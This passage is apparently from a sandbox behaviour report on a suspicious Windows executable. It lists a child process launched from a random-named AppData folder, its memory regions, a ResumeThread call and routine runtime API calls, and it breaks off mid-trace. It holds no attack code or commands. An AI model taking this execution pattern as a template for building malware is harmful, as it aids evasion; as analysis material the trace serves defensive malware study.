[95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0093.605] ResumeThread (hThread=0x48) returned 0x1 [0093.605] CloseHandle (hObject=0x48) returned 1 [0093.605] CloseHandle (hObject=0x4c) returned 1 [0093.605] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0093.606] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0093.606] ExitProcess (uExitCode=0x0) Process: id = "6" image_name = "xey8d7zi.exe" filename = "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe" page_root = "0x7ea16380" os_pid = "0xacc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 412 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 413 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 414 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 415 start_va = 0x400000 end_va = 0x481fff entry_point = 0x400000 region_type = mapped_file name = "xey8d7zi.exe" filename = "\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\vmfccerykvqy\\xey8d7zi.exe") Region: id = 416 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 417 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 418 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 419 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 420 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 421 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 422 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 423 start_va = 0x200000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 424 start_va = 0x670000 end_va = 0x76ffff entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 425 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 426 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 427 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 428 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 429 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 430 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 431 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 432 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 433 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 434 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 435 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 455 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 456 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 457 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 458 start_va = 0x2e0000 end_va = 0x3e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 459 start_va = 0x770000 end_va = 0x136ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 484 start_va = 0x741e0000 end_va = 0x7421ffff entry_point = 0x741e0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 485 start_va = 0x490000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 516 start_va = 0x490000 end_va = 0x56efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 517 start_va = 0x570000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 518 start_va = 0x73eb0000 end_va = 0x73ec2fff entry_point = 0x73eb0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 519 start_va = 0x1d0000 end_va = 0x1d2fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 520 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Thread: id = 6 os_tid = 0xad0 [0093.492] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12ff7c | out: lpSystemTimeAsFileTime=0x12ff7c*(dwLowDateTime=0x76a24640, dwHighDateTime=0x1d440a9)) [0093.492] GetCurrentProcessId () returned 0xacc [0093.492] GetCurrentThreadId () returned 0xad0 [0093.492] GetTickCount () returned 0x22ab7 [0093.492] QueryPerformanceCounter (in: lpPerformanceCount=0x12ff74 | out: lpPerformanceCount=0x12ff74*=15028093602) returned 1 [0093.492] GetStartupInfoW (in: lpStartupInfo=0x12ff20 | out: lpStartupInfo=0x12ff20*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x12ff84, hStdError=0x405b06)) [0093.492] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0093.493] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsAlloc") returned 0x7696418d [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsGetValue") returned 0x76961e16 [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsSetValue") returned 0x769676e6 [0093.493] GetProcAddress (hModule=0x76910000, lpProcName="FlsFree") returned 0x76961f61 [0093.494] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0093.494] GetCurrentThreadId () returned 0xad0 [0093.494] GetStartupInfoW (in: lpStartupInfo=0x12febc | out: lpStartupInfo=0x12febc*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x405699, hStdOutput=0x405a4c, hStdError=0x1c07d0)) [0093.494] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0093.494] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0093.494] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0093.494] SetHandleCount (uNumber=0x20) returned 0x20 [0093.494] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe\" 7l6OWDI9Fmrsoy1O" [0093.494] GetEnvironmentStringsW () returned 0x67faf0* [0093.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0093.494] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x1c11f8, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0093.494] FreeEnvironmentStringsW (penv=0x67faf0) returned 1 [0093.494] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] GetACP () returned 0x4e4 [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] IsValidCodePage (CodePage=0x4e4) returned 1 [0093.495] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12fe84 | out: lpCPInfo=0x12fe84) returned 1 [0093.495] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x12f950 | out: lpCPInfo=0x12f950) returned 1 [0093.495] GetLastError () returned 0x5 [0093.495] SetLastError (dwErrCode=0x5) [0093.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.495] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0093.495] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x12f964 | out: lpCharType=0x12f964) returned 1 [0093.496] GetLastError () returned 0x5 [0093.496] SetLastError (dwErrCode=0x5) [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0093.496] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x12fd64, cbMultiByte=256, lpWideCharStr=0x12f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ") returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0093.496] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ螩ࠑശAĀ", cchSrc=256, lpDestStr=0x12f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0093.496] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x12fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x0b\xa9\xce\x09\x9c\xfe\x12", 